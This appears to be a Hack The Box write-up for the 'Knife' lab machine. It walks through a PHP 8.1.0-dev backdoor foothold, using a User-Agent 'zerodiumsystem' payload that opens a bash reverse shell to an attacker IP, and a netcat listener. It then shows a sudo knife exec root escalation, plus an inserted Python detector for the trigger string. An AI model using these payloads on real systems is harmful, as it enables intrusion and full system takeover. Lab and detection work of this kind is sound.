Pwn Knife HTB

Git_complex
Jun 20, 2021 (3 min read)


Today we are going to solve the Knife machine from Hack The Box.

(Image: Knife machine info card)

First, we run an Nmap scan against the Knife box.

Then let's go to the browser and see what web server is running on port 80.

I tried to enumerate the HTTP web server first by

  1. taking a look at the page source for comments and anything interesting
  2. directory brute-forcing
  3. trying to find version-specific exploits for the running services

None of them turned up anything, but then I noticed that Wappalyzer showed PHP running, version PHP 8.1.0, so I went to Google and searched for an exploit.

I found there are two ways to get a user shell…

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

Here you'll find a Python script that gets a user shell simply by running it and giving it the target URL.

Or we can look at the HTTP request with our favourite buddy, Burp.

Send it to Repeater. We are going to get a reverse shell by forwarding the request with a new User-Agent header and listening on a port with netcat;

the IP will be your OpenVPN IP.

User-Agent: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.162/1234 0>&1'");

and open a listener in another tab…

nc -nvlp 1234
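From the defender's side, the trigger string in that header is easy to spot in reverse-proxy or WAF request logs. The following Python is an added example, not part of the original write-up: it parses raw HTTP requests (constructed samples, not captured traffic), normalises header names, and flags any header whose name starts with "User-Agent" and whose value contains the trigger substring, so a misspelt header name or different letter case does not slip past.

```python
"""Flag HTTP requests carrying the PHP 8.1.0-dev backdoor trigger string."""
from typing import Dict, List

# Trigger substring from the User-Agent payload above; matched case-insensitively.
TRIGGER = "zerodium"

# Constructed sample requests (not captured traffic). Request 1 carries the
# trigger string; request 2 uses a made-up variant header spelling and casing.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.example\r\n"
    "User-Agent: zerodiumsystem(\"id\");\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.example\r\n"
    "user-agentt: ZERODIUMsystem('id');\r\n\r\n",
]


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return the request headers with lower-cased names; the body is ignored."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    header_lines = head.split("\r\n")[1:]  # drop the request line
    headers: Dict[str, str] = {}
    for line in header_lines:
        if ":" not in line:
            continue  # malformed line, skip rather than crash the scanner
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def find_backdoor_trigger(raw_request: str) -> List[str]:
    """Names of headers that look like the backdoor trigger; empty if clean."""
    hits: List[str] = []
    for name, value in parse_headers(raw_request).items():
        # Prefix match on the header name catches spelling variants such as
        # an extra trailing letter; the value check is case-insensitive.
        if name.startswith("user-agent") and TRIGGER in value.lower():
            hits.append(name)
    return hits


def scan(requests: List[str]) -> List[int]:
    """Indexes of the requests that carry a trigger header."""
    return [i for i, req in enumerate(requests) if find_backdoor_trigger(req)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_REQUESTS):
        print(f"request #{idx}: suspicious header(s) "
              f"{find_backdoor_trigger(SAMPLE_REQUESTS[idx])}")
```

Note that Apache's combined log format only records the real User-Agent header, so this check is best run on the raw request headers at the proxy or WAF rather than on access logs alone.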

Now you can easily find the user flag, I suppose…

Let's move on to privilege escalation.

With sudo -l we saw we can run /usr/bin/knife without a password.

After a little enumeration, you'll find how easy it is to get a root shell.

On further enumeration I found out that a knife instance is running.

Google "knife exploit" and read the docs…

Read through the documentation and you'll see we can run Ruby scripts or Ruby code, as stated below:

Run the following command:

sudo knife exec --exec "exec '/bin/sh -i'"

And there we go, we have successfully rooted the box.

Thanks for the read! Please do share and follow me.

Git_complex

Cybersecurity Enthusiast, Bug-bounty hunter, Ethical hacker Exploring new ways to make the Internet a safe place.